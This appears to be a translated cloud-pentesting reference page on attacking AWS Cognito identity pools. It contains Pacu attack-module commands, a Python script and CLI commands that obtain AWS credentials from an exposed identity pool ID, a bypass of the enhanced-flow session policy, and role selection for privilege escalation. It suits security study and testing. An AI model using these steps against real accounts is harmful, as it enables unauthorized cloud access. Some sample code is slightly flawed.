Cognito Identity Pools

Basic Information

पहचान पूल आपके उपयोगकर्ताओं को अस्थायी क्रेडेंशियल्स प्राप्त करने में सक्षम बनाकर एक महत्वपूर्ण भूमिका निभाते हैं। ये क्रेडेंशियल्स विभिन्न AWS सेवाओं, जैसे कि Amazon S3 और DynamoDB, तक पहुँचने के लिए आवश्यक हैं। पहचान पूलों की एक उल्लेखनीय विशेषता यह है कि वे गुमनाम अतिथि उपयोगकर्ताओं और उपयोगकर्ता प्रमाणीकरण के लिए विभिन्न पहचान प्रदाताओं का समर्थन करते हैं। समर्थित पहचान प्रदाता में शामिल हैं:

• Amazon Cognito उपयोगकर्ता पूल

• फेसबुक, गूगल, Amazon के साथ लॉगिन, और Apple के साथ साइन इन जैसे सामाजिक साइन-इन विकल्प

• OpenID कनेक्ट (OIDC) के साथ अनुपालन करने वाले प्रदाता

• SAML (सिक्योरिटी असेर्शन मार्कअप लैंग्वेज) पहचान प्रदाता

• डेवलपर प्रमाणीकरण पहचान

# Sample code to demonstrate how to integrate an identity provider with an identity pool can be structured as follows:
import boto3

# Initialize the Amazon Cognito Identity client
client = boto3.client('cognito-identity')

# Assume you have already created an identity pool and obtained the IdentityPoolId
identity_pool_id = 'your-identity-pool-id'

# Add an identity provider to the identity pool
response = client.set_identity_pool_roles(
IdentityPoolId=identity_pool_id,
Roles={
'authenticated': 'arn:aws:iam::AWS_ACCOUNT_ID:role/AuthenticatedRole',
'unauthenticated': 'arn:aws:iam::AWS_ACCOUNT_ID:role/UnauthenticatedRole',
}
)

# Print the response from AWS
print(response)

Cognito Sync

Identity Pool सत्र उत्पन्न करने के लिए, आपको पहले एक पहचान ID उत्पन्न करने की आवश्यकता है। यह पहचान ID उस उपयोगकर्ता के सत्र की पहचान है। इन पहचानों में 20 तक डेटा सेट हो सकते हैं जो 1MB तक की कुंजी-मूल्य जोड़े को संग्रहीत कर सकते हैं।

यह एक उपयोगकर्ता की जानकारी रखने के लिए उपयोगी है (जो हमेशा उसी पहचान ID का उपयोग करेगा)।

इसके अलावा, सेवा cognito-sync वह सेवा है जो इस जानकारी का प्रबंधन और समन्वय करने की अनुमति देती है (डेटा सेट में, धाराओं में जानकारी भेजना और SNS संदेश...)।

Tools for pentesting

• Pacu, AWS शोषण ढांचा, अब "cognito__enum" और "cognito__attack" मॉड्यूल शामिल करता है जो एक खाते में सभी Cognito संपत्तियों की गणना को स्वचालित करता है और कमजोर कॉन्फ़िगरेशन, उपयोगकर्ता विशेषताएँ जो पहुँच नियंत्रण के लिए उपयोग की जाती हैं, आदि को चिह्नित करता है, और उपयोगकर्ता निर्माण (MFA समर्थन सहित) और परिवर्तनीय कस्टम विशेषताओं, उपयोग योग्य पहचान पूल क्रेडेंशियल्स, ID टोकन में अस्वीकार योग्य भूमिकाओं के आधार पर विशेषाधिकार वृद्धि को भी स्वचालित करता है।

मॉड्यूल के कार्यों का विवरण देखने के लिए ब्लॉग पोस्ट के भाग 2 को देखें। स्थापना निर्देशों के लिए मुख्य Pacu पृष्ठ देखें।

Usage

उपयोगकर्ता निर्माण और दिए गए पहचान पूल और उपयोगकर्ता पूल क्लाइंट के खिलाफ सभी प्रिवेस्क वेक्टरों के प्रयास के लिए नमूना cognito__attack उपयोग:

Pacu (new:test) > run cognito__attack --username randomuser --email XX+sdfs2@gmail.com --identity_pools
us-east-2:a06XXXXX-c9XX-4aXX-9a33-9ceXXXXXXXXX --user_pool_clients
59f6tuhfXXXXXXXXXXXXXXXXXX@us-east-2_0aXXXXXXX

सैंपल cognito__enum का उपयोग वर्तमान AWS खाते में दृश्य सभी उपयोगकर्ता पूल, उपयोगकर्ता पूल क्लाइंट, पहचान पूल, उपयोगकर्ता आदि एकत्र करने के लिए:

Pacu (new:test) > run cognito__enum

• Cognito Scanner एक CLI टूल है जो पायथन में लिखा गया है और यह Cognito पर विभिन्न हमलों को लागू करता है, जिसमें अनचाही खाता निर्माण और पहचान पूल वृद्धि शामिल है।

Installation

$ pip install cognito-scanner

उपयोग

$ cognito-scanner --help

For more information check https://github.com/padok-team/cognito-scanner

Accessing IAM Roles

Unauthenticated

एक हमलावर को AWS क्रेडेंशियल्स प्राप्त करने के लिए एक Cognito ऐप में अनधिकृत उपयोगकर्ता के रूप में केवल Identity Pool ID जानने की आवश्यकता है, और यह ID को वेब/मोबाइल ऐप्लिकेशन में हार्डकोड किया जाना चाहिए ताकि इसका उपयोग किया जा सके। एक ID इस तरह दिखती है: eu-west-1:098e5341-8364-038d-16de-1865e435da3b (यह ब्रूटफोर्स करने योग्य नहीं है)।

यदि आप एक हार्डकोडेड Identity Pools ID पाते हैं और यह अनधिकृत उपयोगकर्ताओं की अनुमति देता है, तो आप AWS क्रेडेंशियल्स प्राप्त कर सकते हैं:

import requests

region = "us-east-1"
id_pool_id = 'eu-west-1:098e5341-8364-038d-16de-1865e435da3b'
url = f'https://cognito-identity.{region}.amazonaws.com/'
headers = {"X-Amz-Target": "AWSCognitoIdentityService.GetId", "Content-Type": "application/x-amz-json-1.1"}
params = {'IdentityPoolId': id_pool_id}

r = requests.post(url, json=params, headers=headers)
json_resp = r.json()

if not "IdentityId" in json_resp:
print(f"Not valid id: {id_pool_id}")
exit

IdentityId = r.json()["IdentityId"]

params = {'IdentityId': IdentityId}

headers["X-Amz-Target"] = "AWSCognitoIdentityService.GetCredentialsForIdentity"
r = requests.post(url, json=params, headers=headers)

print(r.json())

या आप निम्नलिखित aws cli commands का उपयोग कर सकते हैं:

aws cognito-identity get-id --identity-pool-id <identity_pool_id> --no-sign
aws cognito-identity get-credentials-for-identity --identity-id <identity_id> --no-sign

Enhanced vs Basic Authentication flow

पिछले अनुभाग ने डिफ़ॉल्ट संवर्धित प्रमाणीकरण प्रवाह का पालन किया। यह प्रवाह IAM भूमिका सत्र के लिए एक प्रतिबंधात्मक सत्र नीति सेट करता है। यह नीति केवल सत्र को इस सूची से सेवाओं का उपयोग करने की अनुमति देगी (भले ही भूमिका को अन्य सेवाओं तक पहुंच हो)।

हालांकि, इसे बायपास करने का एक तरीका है, यदि पहचान पूल में "बेसिक (क्लासिक) प्रवाह" सक्षम है, तो उपयोगकर्ता उस प्रवाह का उपयोग करके एक सत्र प्राप्त कर सकेगा जो उस प्रतिबंधात्मक सत्र नीति के अधीन नहीं होगा।

# Get auth ID
aws cognito-identity get-id --identity-pool-id <identity_pool_id> --no-sign

# Get login token
aws cognito-identity get-open-id-token --identity-id <identity_id> --no-sign

# Use login token to get IAM session creds
## If you don't know the role_arn use the previous enhanced flow to get it
aws sts assume-role-with-web-identity --role-arn "arn:aws:iam::<acc_id>:role/<role_name>" --role-session-name sessionname --web-identity-token <token> --no-sign

IAM क्रेडेंशियल्स का एक सेट होने पर आपको यह जांचना चाहिए कि आपके पास कौन सा एक्सेस है और अधिकार बढ़ाने की कोशिश करें.

प्रमाणित

प्रमाणित उपयोगकर्ताओं के लिए पहचान पूल में भी भूमिकाएँ उपलब्ध हो सकती हैं।

इसके लिए आपको पहचान प्रदाता तक पहुँच की आवश्यकता हो सकती है। यदि वह एक Cognito User Pool है, तो शायद आप डिफ़ॉल्ट व्यवहार का दुरुपयोग कर सकते हैं और खुद एक नया उपयोगकर्ता बना सकते हैं।

वैसे भी, निम्नलिखित उदाहरण यह अपेक्षा करता है कि आपने पहले ही Cognito User Pool में लॉग इन किया है जिसका उपयोग पहचान पूल तक पहुँचने के लिए किया गया है (यह न भूलें कि अन्य प्रकार के पहचान प्रदाता भी कॉन्फ़िगर किए जा सकते हैं)।

aws cognito-identity get-id \
--identity-pool-id <identity_pool_id> \
--logins cognito-idp.<region>.amazonaws.com/<YOUR_USER_POOL_ID>=<ID_TOKEN>

# पिछले कमांड प्रतिक्रिया से identity_id प्राप्त करें
aws cognito-identity get-credentials-for-identity \
--identity-id <identity_id> \
--logins cognito-idp.<region>.amazonaws.com/<YOUR_USER_POOL_ID>=<ID_TOKEN>


# IdToken में आप देख सकते हैं कि उपयोगकर्ता को User Pool Groups के कारण कौन सी भूमिकाएँ प्राप्त हैं
# एक विशिष्ट भूमिका के लिए क्रेडेंशियल्स प्राप्त करने के लिए --custom-role-arn का उपयोग करें
aws cognito-identity get-credentials-for-identity \
--identity-id <identity_id> \
    --custom-role-arn <role_arn> \
    --logins cognito-idp.<region>.amazonaws.com/<YOUR_USER_POOL_ID>=<ID_TOKEN>